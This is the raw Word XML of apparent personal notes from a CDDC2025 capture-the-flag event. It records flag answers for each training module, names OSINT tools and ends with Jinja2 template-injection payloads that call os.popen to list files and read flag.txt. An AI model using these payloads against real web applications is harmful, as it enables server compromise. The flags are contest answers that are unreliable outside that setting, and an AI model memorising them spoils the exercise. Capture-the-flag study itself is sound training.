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8947" w14:textId="741E8511" w:rsidR="00C61468" w:rsidRDefault="00B850CB" w:rsidP="00B850CB">
      <w:r w:rsidRPr="00B850CB">
        <w:t>CDDC2025{reaper_ch4se_creeper}</w:t>
      </w:r>
      <w:r w:rsidR="00C61468">
        <w:t>- Fundamentals of Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C9F67" w14:textId="77777777" w:rsidR="00C61468" w:rsidRDefault="00C61468" w:rsidP="00B850CB"/>
    <w:p w14:paraId="7B3B124D" w14:textId="77777777" w:rsidR="00B450CC" w:rsidRDefault="00C61468" w:rsidP="00B850CB">
      <w:r w:rsidRPr="00C61468">
        <w:t>CDDC2025{pers0nal_pr0j3ct_nin3tie5}</w:t>
      </w:r>
      <w:r>
        <w:t>- Fundamentals of Linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB2EBBB" w14:textId="7ED4730D" w:rsidR="00B850CB" w:rsidRDefault="00B450CC" w:rsidP="00B850CB">
      <w:r w:rsidRPr="00B450CC">
        <w:t>CDDC2025{w1nd0ws_</w:t>
      </w:r>
      <w:r w:rsidR="00E22715">
        <w:t>m3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B450CC">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00E22715" w:rsidRPr="00E22715">
        <w:t xml:space="preserve"> m1st4ke</w:t>
      </w:r>
      <w:r w:rsidRPr="00B450CC">
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:t>- Fundamentals of Windows</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C61468">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505CD11" w14:textId="708B197F" w:rsidR="00AB34EB" w:rsidRDefault="00AB34EB" w:rsidP="00B850CB">
      <w:r w:rsidRPr="00AB34EB">
        <w:t>CDDC2025{w1r3d_</w:t>
      </w:r>
      <w:r w:rsidR="00337279" w:rsidRPr="00337279">
        <w:t>0pt1c4l</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB34EB">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00337279" w:rsidRPr="00337279">
        <w:t>w1r3l355</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB34EB">
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00337279">
        <w:t>Introduction to Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419F0E9C" w14:textId="77777777" w:rsidR="00EB2BBD" w:rsidRDefault="00EB2BBD" w:rsidP="00B850CB"/>
    <w:p w14:paraId="3D769F41" w14:textId="77BDABFD" w:rsidR="00EB2BBD" w:rsidRDefault="00EB2BBD" w:rsidP="00B850CB">
      <w:r w:rsidRPr="00EB2BBD">
        <w:t>CDDC2025{nn4lw4re_gr4yw4r3_g00dvv4r3}</w:t>
      </w:r>
      <w:r>
        <w:t>- Introduction to Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC21ECA" w14:textId="77777777" w:rsidR="003837D5" w:rsidRDefault="003837D5" w:rsidP="00B850CB"/>
    <w:p w14:paraId="20CB12AB" w14:textId="1CF63DA4" w:rsidR="003837D5" w:rsidRDefault="003837D5" w:rsidP="00B850CB">
      <w:r w:rsidRPr="003837D5">
        <w:t>CDDC2025{1nf0rm4t10n_s3cv12ity_foundation}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Introduction to Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A9ED98" w14:textId="77777777" w:rsidR="005C7360" w:rsidRDefault="005C7360" w:rsidP="00B850CB"/>
    <w:p w14:paraId="5156D0A5" w14:textId="11A2523B" w:rsidR="005C7360" w:rsidRDefault="005C7360" w:rsidP="00B850CB">
      <w:r w:rsidRPr="005C7360">
        <w:t>CDDC2025{c0nf1dentiality_</w:t>
      </w:r>
      <w:r w:rsidR="00A5490F" w:rsidRPr="00A5490F">
        <w:t>authent1cation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7360">
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5490F">
        <w:t>-Introduction to Web Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19619184" w14:textId="77777777" w:rsidR="005A1F79" w:rsidRDefault="005A1F79" w:rsidP="00B850CB"/>
    <w:p w14:paraId="70BF087F" w14:textId="00DA4423" w:rsidR="005A1F79" w:rsidRDefault="005A1F79" w:rsidP="00B850CB">
      <w:r w:rsidRPr="005A1F79">
        <w:t>CDDC2025{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1F79">
        <w:t>rowhammer_memory_</w:t>
      </w:r>
      <w:r>
        <w:t>bit</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1F79">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>flip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1F79">
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Introduction to Hardware CWE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32372B2B" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="00B850CB"/>
    <w:p w14:paraId="27089E62" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shodan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censys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torsocks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, ,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10B0D8F7" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>wayback machine to look for website changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B803A85" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>picarta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for location using image AI searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3151E266" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{collect_validate_analyze_document_secure_share_standby_repeat}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67340E" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{p4ck3t_1nspect10n_f1rew4ll_1ntrus10n_d3t3ct10n}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B44BE1F" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{s1mpl3_3xpl0it4tion_g4me}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473E9E94" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{th0rou9h_pr0cedur3_inv0lv1ng_3vid3nce_c0llect1on_plu5_pr0p3r_4nalys1s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48565C39" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{und3rst4ndin9_4pplic4t1on_s0urc3_c0de_l0gic_us1ng_*********_re4son1ng}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341CC2FC" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{m4gic_happ3n1ng_in51de_c0mputer5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7113F0" w14:textId="77777777" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{wh3re_th3_w0rld_wond3rs}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09361ADB" w14:textId="6316C895" w:rsidR="009E35F6" w:rsidRDefault="009E35F6" w:rsidP="009E35F6">
      <w:r>
        <w:t>CDDC2025{v4luabl3_h1dden_****_********_****_*****_*******_******}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8C85D" w14:textId="77777777" w:rsidR="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="009E35F6"/>
    <w:p w14:paraId="076363D5" w14:textId="77777777" w:rsidR="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="009E35F6"/>
    <w:p w14:paraId="265548F2" w14:textId="2D6F0C95" w:rsidR="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="009E35F6">
      <w:r>
        <w:t xml:space="preserve">SSTI = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{{ 2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>+2}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD2E93" w14:textId="1E2F56DE" w:rsidR="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="00A909FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{{ request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_globals_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_builtins__.__import__('os').popen('ls -la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>).read() }}</w:t>
      </w:r>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="411711E3" w14:textId="2A4D2CCE" w:rsidR="00A909FD" w:rsidRPr="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="00A909FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{{ request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_globals_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_builtins_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_import__('os'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>).popen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">('cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A909FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01EEB5" w14:textId="228ABCFB" w:rsidR="00A909FD" w:rsidRPr="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="00A909FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4807CB0E" w14:textId="77777777" w:rsidR="00A909FD" w:rsidRPr="00A909FD" w:rsidRDefault="00A909FD" w:rsidP="009E35F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A909FD" w:rsidRPr="00A90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CB"/>
    <w:rsid w:val="00337279"/>
    <w:rsid w:val="003837D5"/>
    <w:rsid w:val="003E0984"/>
    <w:rsid w:val="004E77C9"/>
    <w:rsid w:val="005A1F79"/>
    <w:rsid w:val="005C7360"/>
    <w:rsid w:val="009E35F6"/>
    <w:rsid w:val="00A21FE3"/>
    <w:rsid w:val="00A5490F"/>
    <w:rsid w:val="00A909FD"/>
    <w:rsid w:val="00AB34EB"/>
    <w:rsid w:val="00AB60C0"/>
    <w:rsid w:val="00B450CC"/>
    <w:rsid w:val="00B850CB"/>
    <w:rsid w:val="00C61468"/>
    <w:rsid w:val="00E22715"/>
    <w:rsid w:val="00E9096E"/>
    <w:rsid w:val="00E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07BD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{160A8EC8-9B4D-4828-BF5D-570B9F14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蘇彦彰</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>#SOH YAN ZHANG#</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-15T07:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-20T11:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>